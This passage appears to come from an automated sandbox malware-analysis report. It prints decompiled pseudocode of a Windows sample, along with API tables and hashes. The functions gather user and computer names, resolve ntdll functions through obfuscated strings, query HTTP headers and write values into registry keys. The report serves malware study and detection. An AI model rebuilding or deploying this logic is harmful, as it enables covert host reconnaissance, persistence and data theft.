            							_t58 = E047E33DC(_v8 + 1);
            							if(_t58 == 0) {
            								_v12 = 8;
            							} else {
            								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
            									E047E61DA(_t58);
            									_v12 = GetLastError();
            								} else {
            									 *((char*)(_t58 + _v8)) = 0;
            									 *(_t61 + 0xc) = _t58;
            								}
            							}
            							goto L15;
            						}
            					}
            					SetEvent( *(_t61 + 0x1c));
            					_t56 =  *((intOrPtr*)(_t61 + 0x28));
            					_v12 = _t56;
            					if(_t56 != 0) {
            						goto L15;
            					}
            					goto L3;
            					L11:
            					_t42 = E047E16B2( *(_t61 + 0x1c), _t59, 0xea60);
            					_v12 = _t42;
            				} while (_t42 == 0);
            				goto L15;
            			}














            0x047e3fa5
            0x047e3fa5
            0x047e3fb5
            0x047e3fb8
            0x047e3fbc
            0x047e3fc2
            0x047e3fc7
            0x047e3fe0
            0x047e3ff4
            0x047e3ffb
            0x047e4002
            0x047e4055
            0x047e405b
            0x047e4061
            0x047e409c
            0x047e40a2
            0x00000000
            0x00000000
            0x00000000
            0x047e4061
            0x047e4008
            0x00000000
            0x047e400f
            0x047e401d
            0x047e4020
            0x047e4023
            0x047e402f
            0x047e4033
            0x047e4095
            0x047e4035
            0x047e4047
            0x047e4085
            0x047e4090
            0x047e4049
            0x047e404c
            0x047e4050
            0x047e4050
            0x047e4047
            0x00000000
            0x047e4033
            0x047e4008
            0x047e3fcc
            0x047e3fd2
            0x047e3fd5
            0x047e3fda
            0x00000000
            0x00000000
            0x00000000
            0x047e406a
            0x047e4072
            0x047e4077
            0x047e407a
            0x00000000

            APIs
            • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,746981D0,00000000,00000000), ref: 047E3FBC
            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,047E3F34,00000000,?), ref: 047E3FCC
            • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 047E3FFE
            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 047E4023
            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 047E4043
            • GetLastError.KERNEL32 ref: 047E4055
              • Part of subcall function 047E16B2: WaitForMultipleObjects.KERNEL32(00000002,047E7C47,00000000,047E7C47,?,?,?,047E7C47,0000EA60), ref: 047E16CD
              • Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6
            • GetLastError.KERNEL32(00000000), ref: 047E408A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
            • String ID: @MetNet
            • API String ID: 3369646462-2109406137
            • Opcode ID: cdf6af6cc6283e9c8304c5f58e09e78178eaaad09d40bd103c6918e82e558042
            • Instruction ID: 79bc4c1de8bc77a27c382f220062e726ffb38474ae8290ff618956c9e781b993
            • Opcode Fuzzy Hash: cdf6af6cc6283e9c8304c5f58e09e78178eaaad09d40bd103c6918e82e558042
            • Instruction Fuzzy Hash: 0E3100B5D00309EFDB21DFE6CC849AEB7B8EB4C304F104AB9E642A6641D775AA449F50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 43%
            			E047E7238(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				char _v20;
            				intOrPtr _v24;
            				signed int _v28;
            				intOrPtr _v32;
            				void* __edi;
            				void* __esi;
            				intOrPtr _t58;
            				signed int _t60;
            				signed int _t62;
            				intOrPtr _t64;
            				intOrPtr _t66;
            				intOrPtr _t70;
            				void* _t72;
            				void* _t75;
            				void* _t76;
            				intOrPtr _t80;
            				WCHAR* _t83;
            				void* _t84;
            				void* _t85;
            				void* _t86;
            				intOrPtr _t92;
            				intOrPtr* _t102;
            				signed int _t103;
            				void* _t104;
            				intOrPtr _t105;
            				void* _t107;
            				intOrPtr* _t115;
            				void* _t119;
            				intOrPtr _t125;
            
            				_t58 =  *0x47ea3dc; // 0x5429ca8
            				_v24 = _t58;
            				_v28 = 8;
            				_v20 = GetTickCount();
            				_t60 = E047E6ABD();
            				_t103 = 5;
            				_t98 = _t60 % _t103 + 6;
            				_t62 = E047E6ABD();
            				_t117 = _t62 % _t103 + 6;
            				_v32 = _t62 % _t103 + 6;
            				_t64 = E047E42E9(_t60 % _t103 + 6);
            				_v16 = _t64;
            				if(_t64 != 0) {
            					_t66 = E047E42E9(_t117);
            					_v12 = _t66;
            					if(_t66 != 0) {
            						_push(5);
            						_t104 = 0xa;
            						_t119 = E047E398D(_t104,  &_v20);
            						if(_t119 == 0) {
            							_t119 = 0x47e918c;
            						}
            						_t70 = E047E5FA1(_v24);
            						_v8 = _t70;
            						if(_t70 != 0) {
            							_t115 = __imp__;
            							_t72 =  *_t115(_t119);
            							_t75 =  *_t115(_v8);
            							_t76 =  *_t115(_a4);
            							_t80 = E047E33DC(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
            							_v24 = _t80;
            							if(_t80 != 0) {
            								_t105 =  *0x47ea348; // 0xc3d5a8
            								_t102 =  *0x47ea138; // 0x47e7ddd
            								_t28 = _t105 + 0x47ebd10; // 0x530025
            								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
            								_push(4);
            								_t107 = 5;
            								_t83 = E047E398D(_t107,  &_v20);
            								_a8 = _t83;
            								if(_t83 == 0) {
            									_a8 = 0x47e9190;
            								}
            								_t84 =  *_t115(_a8);
            								_t85 =  *_t115(_v8);
            								_t86 =  *_t115(_a4);
            								_t125 = E047E33DC(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
            								if(_t125 == 0) {
            									E047E61DA(_v24);
            								} else {
            									_t92 =  *0x47ea348; // 0xc3d5a8
            									_t44 = _t92 + 0x47eba20; // 0x73006d
            									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
            									 *_a16 = _v24;
            									_v28 = _v28 & 0x00000000;
            									 *_a20 = _t125;
            								}
            							}
            							E047E61DA(_v8);
            						}
            						E047E61DA(_v12);
            					}
            					E047E61DA(_v16);
            				}
            				return _v28;
            			}



































            0x047e723e
            0x047e7246
            0x047e7249
            0x047e7256
            0x047e7259
            0x047e7260
            0x047e7267
            0x047e726a
            0x047e7277
            0x047e727a
            0x047e727d
            0x047e7282
            0x047e7287
            0x047e728f
            0x047e7294
            0x047e7299
            0x047e729f
            0x047e72a3
            0x047e72ac
            0x047e72b0
            0x047e72b2
            0x047e72b2
            0x047e72ba
            0x047e72bf
            0x047e72c4
            0x047e72ca
            0x047e72d1
            0x047e72e2
            0x047e72e9
            0x047e72fb
            0x047e7300
            0x047e7305
            0x047e730e
            0x047e7317
            0x047e7320
            0x047e7336
            0x047e733b
            0x047e733f
            0x047e7343
            0x047e7348
            0x047e734d
            0x047e734f
            0x047e734f
            0x047e7359
            0x047e7362
            0x047e7369
            0x047e7385
            0x047e7389
            0x047e73c2
            0x047e738b
            0x047e738e
            0x047e7396
            0x047e73a7
            0x047e73af
            0x047e73b7
            0x047e73bb
            0x047e73bb
            0x047e7389
            0x047e73ca
            0x047e73ca
            0x047e73d2
            0x047e73d2
            0x047e73da
            0x047e73da
            0x047e73e6

            APIs
            • GetTickCount.KERNEL32 ref: 047E7250
            • lstrlen.KERNEL32(00000000,00000005), ref: 047E72D1
            • lstrlen.KERNEL32(?), ref: 047E72E2
            • lstrlen.KERNEL32(00000000), ref: 047E72E9
            • lstrlenW.KERNEL32(80000002), ref: 047E72F0
            • lstrlen.KERNEL32(?,00000004), ref: 047E7359
            • lstrlen.KERNEL32(?), ref: 047E7362
            • lstrlen.KERNEL32(?), ref: 047E7369
            • lstrlenW.KERNEL32(?), ref: 047E7370
              • Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: lstrlen$CountFreeHeapTick
            • String ID:
            • API String ID: 2535036572-0
            • Opcode ID: e80bec0363692fd2f500eb56d9b0648d7ef5b0040af2c4e39f335f8cf57d4dea
            • Instruction ID: 0e09e0a169d7d5512d3e5ca910c21e8077498525116e11e41b9bf9b378a643e4
            • Opcode Fuzzy Hash: e80bec0363692fd2f500eb56d9b0648d7ef5b0040af2c4e39f335f8cf57d4dea
            • Instruction Fuzzy Hash: AF516472D00119ABDF12AFA6DC48DEE7BB5EF48318F058125EE04AB310D735EA11DB94
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E1340() {
            				long _v8;
            				long _v12;
            				int _v16;
            				long _t39;
            				long _t43;
            				signed int _t47;
            				short _t51;
            				signed int _t52;
            				int _t56;
            				int _t57;
            				char* _t64;
            				short* _t67;
            
            				_v16 = 0;
            				_v8 = 0;
            				GetUserNameW(0,  &_v8);
            				_t39 = _v8;
            				if(_t39 != 0) {
            					_v12 = _t39;
            					_v8 = 0;
            					GetComputerNameW(0,  &_v8);
            					_t43 = _v8;
            					if(_t43 != 0) {
            						_t11 = _t43 + 2; // 0x76b5c742
            						_v12 = _v12 + _t11;
            						_t64 = E047E33DC(_v12 + _t11 << 2);
            						if(_t64 != 0) {
            							_t47 = _v12;
            							_t67 = _t64 + _t47 * 2;
            							_v8 = _t47;
            							if(GetUserNameW(_t67,  &_v8) == 0) {
            								L7:
            								E047E61DA(_t64);
            							} else {
            								_t51 = 0x40;
            								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
            								_t52 = _v8;
            								_v12 = _v12 - _t52;
            								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
            									goto L7;
            								} else {
            									_t56 = _v12 + _v8;
            									_t31 = _t56 + 2; // 0x47e3e01
            									_v12 = _t56;
            									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
            									_v8 = _t57;
            									if(_t57 == 0) {
            										goto L7;
            									} else {
            										_t64[_t57] = 0;
            										_v16 = _t64;
            									}
            								}
            							}
            						}
            					}
            				}
            				return _v16;
            			}















            0x047e134e
            0x047e1351
            0x047e1354
            0x047e135a
            0x047e135f
            0x047e1365
            0x047e136d
            0x047e1370
            0x047e1376
            0x047e137b
            0x047e1384
            0x047e1388
            0x047e1395
            0x047e1399
            0x047e139b
            0x047e139f
            0x047e13a2
            0x047e13b2
            0x047e1405
            0x047e1406
            0x047e13b4
            0x047e13b9
            0x047e13ba
            0x047e13bf
            0x047e13c2
            0x047e13d5
            0x00000000
            0x047e13d7
            0x047e13da
            0x047e13df
            0x047e13ed
            0x047e13f0
            0x047e13f6
            0x047e13fb
            0x00000000
            0x047e13fd
            0x047e13fd
            0x047e1400
            0x047e1400
            0x047e13fb
            0x047e13d5
            0x047e140b
            0x047e140c
            0x047e137b
            0x047e1412

            APIs
            • GetUserNameW.ADVAPI32(00000000,047E3DFF), ref: 047E1354
            • GetComputerNameW.KERNEL32(00000000,047E3DFF), ref: 047E1370
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • GetUserNameW.ADVAPI32(00000000,047E3DFF), ref: 047E13AA
            • GetComputerNameW.KERNEL32(047E3DFF,76B5C740), ref: 047E13CD
            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,047E3DFF,00000000,047E3E01,00000000,00000000,?,76B5C740,047E3DFF), ref: 047E13F0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
            • String ID: @het
            • API String ID: 3850880919-3010869118
            • Opcode ID: e88a2e8ba4d390cf6571d1043efbd1e1b35583233cf1fac6d5a9809c24931ef7
            • Instruction ID: 17df68f5571225e6dc3d45f1f95cb3f4cf2d2500582515699c767840155e7fc0
            • Opcode Fuzzy Hash: e88a2e8ba4d390cf6571d1043efbd1e1b35583233cf1fac6d5a9809c24931ef7
            • Instruction Fuzzy Hash: D321F8B6900108FFDB11DFE6C9858EEBBB8EF48304B5045AAE501E7240DB34AB45DB60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E54D8(intOrPtr _a4) {
            				void* _t2;
            				unsigned int _t4;
            				void* _t5;
            				long _t6;
            				void* _t7;
            				void* _t15;
            
            				_t2 = CreateEventA(0, 1, 0, 0);
            				 *0x47ea30c = _t2;
            				if(_t2 == 0) {
            					return GetLastError();
            				}
            				_t4 = GetVersion();
            				if(_t4 != 5) {
            					L4:
            					if(_t15 <= 0) {
            						_t5 = 0x32;
            						return _t5;
            					}
            					L5:
            					 *0x47ea2fc = _t4;
            					_t6 = GetCurrentProcessId();
            					 *0x47ea2f8 = _t6;
            					 *0x47ea304 = _a4;
            					_t7 = OpenProcess(0x10047a, 0, _t6);
            					 *0x47ea2f4 = _t7;
            					if(_t7 == 0) {
            						 *0x47ea2f4 =  *0x47ea2f4 | 0xffffffff;
            					}
            					return 0;
            				}
            				if(_t4 >> 8 > 0) {
            					goto L5;
            				}
            				_t15 = _t4 - _t4;
            				goto L4;
            			}









            0x047e54e0
            0x047e54e6
            0x047e54ed
            0x00000000
            0x047e5547
            0x047e54ef
            0x047e54f7
            0x047e5504
            0x047e5504
            0x047e5544
            0x00000000
            0x047e5544
            0x047e5506
            0x047e5506
            0x047e550b
            0x047e551d
            0x047e5522
            0x047e5528
            0x047e552e
            0x047e5535
            0x047e5537
            0x047e5537
            0x00000000
            0x047e553e
            0x047e5500
            0x00000000
            0x00000000
            0x047e5502
            0x00000000

            APIs
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,047E5037,?), ref: 047E54E0
            • GetVersion.KERNEL32 ref: 047E54EF
            • GetCurrentProcessId.KERNEL32 ref: 047E550B
            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 047E5528
            • GetLastError.KERNEL32 ref: 047E5547
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
            • String ID: @MetNet
            • API String ID: 2270775618-2109406137
            • Opcode ID: 307326dcb48ece887454c841670ec425793a61845db9da514893cf2a208f6929
            • Instruction ID: 978bfaee379e97490858d48cca84e4f1f2218be8e2b326a7f662dbfcd9e81293
            • Opcode Fuzzy Hash: 307326dcb48ece887454c841670ec425793a61845db9da514893cf2a208f6929
            • Instruction Fuzzy Hash: 3EF081F4640307ABD7208B63A919BA43B67E74C759F508B19E613EE2C0E6789880CB15
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysAllocString.OLEAUT32(00000000), ref: 047E3ABD
            • SysAllocString.OLEAUT32(0070006F), ref: 047E3AD1
            • SysAllocString.OLEAUT32(00000000), ref: 047E3AE3
            • SysFreeString.OLEAUT32(00000000), ref: 047E3B4B
            • SysFreeString.OLEAUT32(00000000), ref: 047E3B5A
            • SysFreeString.OLEAUT32(00000000), ref: 047E3B65
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: 29d382f5541011d12fc126e8f6037eaeb307dc6885f17f31520145e447f98c3b
            • Instruction ID: a53e816fbf38574f3a356ca047e142b117b62dcaa9ce21b1a4ec5c7aa57d8b81
            • Opcode Fuzzy Hash: 29d382f5541011d12fc126e8f6037eaeb307dc6885f17f31520145e447f98c3b
            • Instruction Fuzzy Hash: C1419176D00609ABDF01DFBDC844AAEB7BAEF49300F108526EE11EB210DA71ED05CB91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E6BF9(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
            				intOrPtr _v8;
            				intOrPtr _t23;
            				intOrPtr _t26;
            				_Unknown_base(*)()* _t28;
            				intOrPtr _t30;
            				_Unknown_base(*)()* _t32;
            				intOrPtr _t33;
            				_Unknown_base(*)()* _t35;
            				intOrPtr _t36;
            				_Unknown_base(*)()* _t38;
            				intOrPtr _t39;
            				_Unknown_base(*)()* _t41;
            				intOrPtr _t44;
            				struct HINSTANCE__* _t48;
            				intOrPtr _t54;
            
            				_t54 = E047E33DC(0x20);
            				if(_t54 == 0) {
            					_v8 = 8;
            				} else {
            					_t23 =  *0x47ea348; // 0xc3d5a8
            					_t1 = _t23 + 0x47eb436; // 0x4c44544e
            					_t48 = GetModuleHandleA(_t1);
            					_t26 =  *0x47ea348; // 0xc3d5a8
            					_t2 = _t26 + 0x47eb85c; // 0x7243775a
            					_v8 = 0x7f;
            					_t28 = GetProcAddress(_t48, _t2);
            					 *(_t54 + 0xc) = _t28;
            					if(_t28 == 0) {
            						L8:
            						E047E61DA(_t54);
            					} else {
            						_t30 =  *0x47ea348; // 0xc3d5a8
            						_t5 = _t30 + 0x47eb849; // 0x614d775a
            						_t32 = GetProcAddress(_t48, _t5);
            						 *(_t54 + 0x10) = _t32;
            						if(_t32 == 0) {
            							goto L8;
            						} else {
            							_t33 =  *0x47ea348; // 0xc3d5a8
            							_t7 = _t33 + 0x47eb72b; // 0x6e55775a
            							_t35 = GetProcAddress(_t48, _t7);
            							 *(_t54 + 0x14) = _t35;
            							if(_t35 == 0) {
            								goto L8;
            							} else {
            								_t36 =  *0x47ea348; // 0xc3d5a8
            								_t9 = _t36 + 0x47eb883; // 0x4e6c7452
            								_t38 = GetProcAddress(_t48, _t9);
            								 *(_t54 + 0x18) = _t38;
            								if(_t38 == 0) {
            									goto L8;
            								} else {
            									_t39 =  *0x47ea348; // 0xc3d5a8
            									_t11 = _t39 + 0x47eb87b; // 0x6c43775a
            									_t41 = GetProcAddress(_t48, _t11);
            									 *(_t54 + 0x1c) = _t41;
            									if(_t41 == 0) {
            										goto L8;
            									} else {
            										 *((intOrPtr*)(_t54 + 4)) = _a4;
            										 *((intOrPtr*)(_t54 + 8)) = 0x40;
            										_t44 = E047E7A08(_t54, _a8);
            										_v8 = _t44;
            										if(_t44 != 0) {
            											goto L8;
            										} else {
            											 *_a12 = _t54;
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            				return _v8;
            			}


















            0x047e6c08
            0x047e6c0c
            0x047e6cce
            0x047e6c12
            0x047e6c12
            0x047e6c17
            0x047e6c2a
            0x047e6c2c
            0x047e6c31
            0x047e6c39
            0x047e6c40
            0x047e6c42
            0x047e6c47
            0x047e6cc6
            0x047e6cc7
            0x047e6c49
            0x047e6c49
            0x047e6c4e
            0x047e6c56
            0x047e6c58
            0x047e6c5d
            0x00000000
            0x047e6c5f
            0x047e6c5f
            0x047e6c64
            0x047e6c6c
            0x047e6c6e
            0x047e6c73
            0x00000000
            0x047e6c75
            0x047e6c75
            0x047e6c7a
            0x047e6c82
            0x047e6c84
            0x047e6c89
            0x00000000
            0x047e6c8b
            0x047e6c8b
            0x047e6c90
            0x047e6c98
            0x047e6c9a
            0x047e6c9f
            0x00000000
            0x047e6ca1
            0x047e6ca7
            0x047e6cac
            0x047e6cb3
            0x047e6cb8
            0x047e6cbd
            0x00000000
            0x047e6cbf
            0x047e6cc2
            0x047e6cc2
            0x047e6cbd
            0x047e6c9f
            0x047e6c89
            0x047e6c73
            0x047e6c5d
            0x047e6c47
            0x047e6cdc

            APIs
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,047E37FB,?,?,?,?,00000000,00000000), ref: 047E6C1E
            • GetProcAddress.KERNEL32(00000000,7243775A), ref: 047E6C40
            • GetProcAddress.KERNEL32(00000000,614D775A), ref: 047E6C56
            • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 047E6C6C
            • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 047E6C82
            • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 047E6C98
              • Part of subcall function 047E7A08: memset.NTDLL ref: 047E7A87
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: AddressProc$AllocateHandleHeapModulememset
            • String ID:
            • API String ID: 1886625739-0
            • Opcode ID: 4af6684de9e92fb81e62661c58900d6f09ed846ffb5dc2e77a89b98bacccffcf
            • Instruction ID: b6cea81d8a52ee16158aeaca3f0a766a1a2748900f849960973526ae5ffbd698
            • Opcode Fuzzy Hash: 4af6684de9e92fb81e62661c58900d6f09ed846ffb5dc2e77a89b98bacccffcf
            • Instruction Fuzzy Hash: 9F212DB160070AAFD720DF6BC944EAABBECEB1C2447408615E505CB721E778F908CB60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 88%
            			E047E4C94(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
            				signed int _v8;
            				char _v12;
            				signed int* _v16;
            				char _v284;
            				void* __esi;
            				char* _t59;
            				intOrPtr* _t60;
            				intOrPtr _t64;
            				char _t65;
            				intOrPtr _t68;
            				intOrPtr _t69;
            				intOrPtr _t71;
            				void* _t73;
            				signed int _t81;
            				void* _t91;
            				void* _t92;
            				char _t98;
            				signed int* _t100;
            				intOrPtr* _t101;
            				void* _t102;
            
            				_t92 = __ecx;
            				_v8 = _v8 & 0x00000000;
            				_t98 = _a16;
            				if(_t98 == 0) {
            					__imp__( &_v284,  *0x47ea3dc);
            					_t91 = 0x80000002;
            					L6:
            					_t59 = E047E6536( &_v284,  &_v284);
            					_a8 = _t59;
            					if(_t59 == 0) {
            						_v8 = 8;
            						L29:
            						_t60 = _a20;
            						if(_t60 != 0) {
            							 *_t60 =  *_t60 + 1;
            						}
            						return _v8;
            					}
            					_t101 = _a24;
            					if(E047E313F(_t92, _t97, _t101, _t91, _t59) != 0) {
            						L27:
            						E047E61DA(_a8);
            						goto L29;
            					}
            					_t64 =  *0x47ea318; // 0x5429e00
            					_t16 = _t64 + 0xc; // 0x5429f22
            					_t65 = E047E6536(_t64,  *_t16);
            					_a24 = _t65;
            					if(_t65 == 0) {
            						L14:
            						_t29 = _t101 + 0x14; // 0x102
            						_t33 = _t101 + 0x10; // 0x3d047e90
            						if(E047E7767(_t97,  *_t33, _t91, _a8,  *0x47ea3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
            							_t68 =  *0x47ea348; // 0xc3d5a8
            							if(_t98 == 0) {
            								_t35 = _t68 + 0x47ebb5a; // 0x4d4c4b48
            								_t69 = _t35;
            							} else {
            								_t34 = _t68 + 0x47ebbac; // 0x55434b48
            								_t69 = _t34;
            							}
            							if(E047E7238(_t69,  *0x47ea3d4,  *0x47ea3d8,  &_a24,  &_a16) == 0) {
            								if(_t98 == 0) {
            									_t71 =  *0x47ea348; // 0xc3d5a8
            									_t44 = _t71 + 0x47eb332; // 0x74666f53
            									_t73 = E047E6536(_t44, _t44);
            									_t99 = _t73;
            									if(_t73 == 0) {
            										_v8 = 8;
            									} else {
            										_t47 = _t101 + 0x10; // 0x3d047e90
            										E047E5B0E( *_t47, _t91, _a8,  *0x47ea3d8, _a24);
            										_t49 = _t101 + 0x10; // 0x3d047e90
            										E047E5B0E( *_t49, _t91, _t99,  *0x47ea3d0, _a16);
            										E047E61DA(_t99);
            									}
            								} else {
            									_t40 = _t101 + 0x10; // 0x3d047e90
            									E047E5B0E( *_t40, _t91, _a8,  *0x47ea3d8, _a24);
            									_t43 = _t101 + 0x10; // 0x3d047e90
            									E047E5B0E( *_t43, _t91, _a8,  *0x47ea3d0, _a16);
            								}
            								if( *_t101 != 0) {
            									E047E61DA(_a24);
            								} else {
            									 *_t101 = _a16;
            								}
            							}
            						}
            						goto L27;
            					}
            					_t21 = _t101 + 0x10; // 0x3d047e90
            					_t81 = E047E58BD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
            					if(_t81 == 0) {
            						_t100 = _v16;
            						if(_v12 == 0x28) {
            							 *_t100 =  *_t100 & _t81;
            							_t26 = _t101 + 0x10; // 0x3d047e90
            							E047E7767(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
            						}
            						E047E61DA(_t100);
            						_t98 = _a16;
            					}
            					E047E61DA(_a24);
            					goto L14;
            				}
            				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
            					goto L29;
            				} else {
            					_t97 = _a8;
            					E047E7AB0(_t98, _a8,  &_v284);
            					__imp__(_t102 + _t98 - 0x117,  *0x47ea3dc);
            					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
            					_t91 = 0x80000003;
            					goto L6;
            				}
            			}























            0x047e4c94
            0x047e4c9d
            0x047e4ca4
            0x047e4ca9
            0x047e4d16
            0x047e4d1c
            0x047e4d21
            0x047e4d28
            0x047e4d2d
            0x047e4d32
            0x047e4e9d
            0x047e4ea4
            0x047e4ea4
            0x047e4ea9
            0x047e4eab
            0x047e4eab
            0x047e4eb4
            0x047e4eb4
            0x047e4d38
            0x047e4d44
            0x047e4e93
            0x047e4e96
            0x00000000
            0x047e4e96
            0x047e4d4a
            0x047e4d4f
            0x047e4d52
            0x047e4d57
            0x047e4d5c
            0x047e4da5
            0x047e4da5
            0x047e4db8
            0x047e4dc2
            0x047e4dc8
            0x047e4dcf
            0x047e4dd9
            0x047e4dd9
            0x047e4dd1
            0x047e4dd1
            0x047e4dd1
            0x047e4dd1
            0x047e4dfb
            0x047e4e03
            0x047e4e31
            0x047e4e36
            0x047e4e3d
            0x047e4e42
            0x047e4e46
            0x047e4e78
            0x047e4e48
            0x047e4e55
            0x047e4e58
            0x047e4e68
            0x047e4e6b
            0x047e4e71
            0x047e4e71
            0x047e4e05
            0x047e4e12
            0x047e4e15
            0x047e4e27
